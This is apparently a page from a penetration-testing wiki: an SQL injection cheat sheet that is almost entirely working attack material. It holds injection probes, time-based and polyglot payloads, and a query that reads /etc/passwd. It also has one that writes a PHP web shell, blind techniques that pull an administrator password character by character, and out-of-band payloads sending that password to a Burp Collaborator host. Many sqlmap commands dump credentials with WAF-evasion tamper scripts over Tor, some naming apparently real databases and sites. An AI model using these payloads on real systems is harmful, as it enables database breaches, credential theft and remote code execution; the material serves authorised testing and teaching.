Pentest Book
Search…
SQLi
SQL injection cheat sheet | Web Security Academy
WebSecAcademy

Common

1
/?q=1
2
/?q=1'
3
/?q=1"
4
/?q=[1]
5
/?q[]=1
6
/?q=1`
7
/?q=1\
8
/?q=1/*'*/
9
/?q=1/*!1111'*/
10
/?q=1'||'asd'||' <== concat string
11
/?q=1' or '1'='1
12
/?q=1 or 1=1
13
/?q='or''='
14
/?q=(1)or(0)=(1)
15
16
# Useful payloads
17
' WAITFOR DELAY '0:0:5'--
18
';WAITFOR DELAY '0:0:5'--
19
')) or sleep(5)='
20
;waitfor delay '0:0:5'--
21
);waitfor delay '0:0:5'--
22
';waitfor delay '0:0:5'--
23
";waitfor delay '0:0:5'--
24
');waitfor delay '0:0:5'--
25
");waitfor delay '0:0:5'--
26
));waitfor delay '0:0:5'--
Copied!

Polyglot

1
', ",'),"), (),., * /, <! -, -
2
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
3
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
Copied!

Resources by type

1
# MySQL:
2
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
3
https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
4
5
# MSQQL:
6
http://evilsql.com/main/page2.php
7
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
8
9
# ORACLE:
10
http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet
11
12
# POSTGRESQL:
13
http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet
14
15
# Others
16
http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
17
http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet
18
http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet
19
http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet
20
https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet
21
http://rails-sqli.org/
22
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
Copied!

R/W files

1
# Read file
2
UNION SELECT LOAD_FILE ("etc/passwd")--
3
4
# Write a file
5
UNION SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/tmp/shell.php"-
Copied!

Blind SQLi

1
# Conditional Responses
2
3
# Request with:
4
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4
5
6
In the DDBB it does:
7
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4' - If exists, show content or “Welcome back”
8
9
# To detect:
10
TrackingId=x'+OR+1=1-- OK
11
TrackingId=x'+OR+1=2-- KO
12
# User admin exist
13
TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'-- OK
14
# Password length
15
TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+length(password)>1--
16
17
# So, in the cookie header if first letter of password is greater than ‘m’, or ‘t’ or equal to ‘s’ response will be ok.
18
19
xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) > 'm'--
20
xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) > 't'--
21
xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) = 's'--
22
z'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+substring(password,6,1)='§a§'--
23
24
# Force conditional responses
25
26
TrackingId=x'+UNION+SELECT+CASE+WHEN+(1=1)+THEN+to_char(1/0)+ELSE+NULL+END+FROM+dual-- RETURNS ERROR IF OK
27
TrackingId=x'+UNION+SELECT+CASE+WHEN+(1=2)+THEN+to_char(1/0)+ELSE+NULL+END+FROM+dual-- RETURNS NORMALLY IF KO
28
TrackingId='+UNION+SELECT+CASE+WHEN+(username='administrator'+AND+substr(password,3,1)='§a§')+THEN+to_char(1/0)+ELSE+NULL+END+FROM+users--;
29
30
# Time delays
31
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
32
TrackingId=x'; IF (SELECT COUNT(username) FROM Users WHERE username = 'Administrator' AND SUBSTRING(password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
33
TrackingId=x'; IF (1=2) WAITFOR DELAY '0:0:10'--
34
TrackingId=x'||pg_sleep(10)--
35
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
36
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+substring(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
37
38
# Out-of-Band OAST (Collaborator)
39
Asynchronous response
40
41
# Confirm:
42
TrackingId=x'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//x.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--
43
44
# Exfil:
45
TrackingId=x'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'[email protected]+'.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net/a"')--
46
TrackingId=x'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--
Copied!

Second Order SQLi

1
# A second-order SQL Injection, on the other hand, is a vulnerability exploitable in two different steps:
2
1. Firstly, we STORE a particular user-supplied input value in the DB and
3
2. Secondly, we use the stored value to exploit a vulnerability in a vulnerable function in the source code which constructs the dynamic query of the web application.
4
5
# Example payload:
6
X' UNION SELECT user(),version(),database(), 4 --
7
X' UNION SELECT 1,2,3,4 --
8
9
# For example, in a password reset query with user "User123' --":
10
11
$pwdreset = mysql_query("UPDATE users SET password='getrekt' WHERE username='User123' — ' and password='[email protected]'");
12
13
# Will be:
14
15
$pwdreset = mysql_query("UPDATE users SET password='getrekt' WHERE username='User123'");
16
17
# So you don't need to know the password.
18
19
- User = ' or 'asd'='asd it will return always true
20
- User = admin'-- probably not check the password
Copied!

sqlmap

1
# Post
2
sqlmap -r search-test.txt -p tfUPass
3
4
# Get
5
sqlmap -u "http://10.11.1.111/index.php?id=1" --dbms=mysql
6
7
# Crawl
8
sqlmap -u http://10.11.1.111 --dbms=mysql --crawl=3
9
10
# Full auto - FORMS
11
sqlmap -u 'http://10.11.1.111:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch
12
# Columns
13
sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --columns -T users -D admin
14
# Values
15
sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --dump -T users -D admin
16
17
sqlmap -o -u "http://10.11.1.111:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3 --threads=10 --dbms=MySQL --users --passwords
18
19
# SQLMAP WAF bypass
20
21
sqlmap --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
22
sqlmap --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
23
sqlmap --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
24
sqlmap -v3 --technique=T --no-cast --fresh-queries --banner
25
sqlmap -u http://www.example.com/index?id=1 --level 2 --risk 3 --batch --dbs
26
27
28
sqlmap -f -b --current-user --current-db --is-dba --users --dbs
29
sqlmap --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
30
sqlmap --risk 3 --level 5 --random-agent --proxy http://123.57.48.140:8080 --dbs
31
sqlmap --random-agent --dbms=MYSQL --dbs --technique=B"
32
sqlmap --identify-waf --random-agent -v 3 --dbs
33
34
1 : --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
35
2 : --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3
36
37
sqlmap --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump
38
sqlmap --tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent
39
sqlmap -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
40
sqlmap --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2
41
sqlmap -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --colu
42
43
sqlmap --wizard
44
sqlmap --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
45
sqlmap -url www.site.ps/index.php --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql
46
sqlmap -url www.site.ps/index.php --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
47
48
# Tamper suggester
49
https://github.com/m4ll0k/Atlas
50
51
--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent
52
--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables
53
--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns
54
--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump
55
# Tamper list
56
between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percent
Copied!
Last modified 20d ago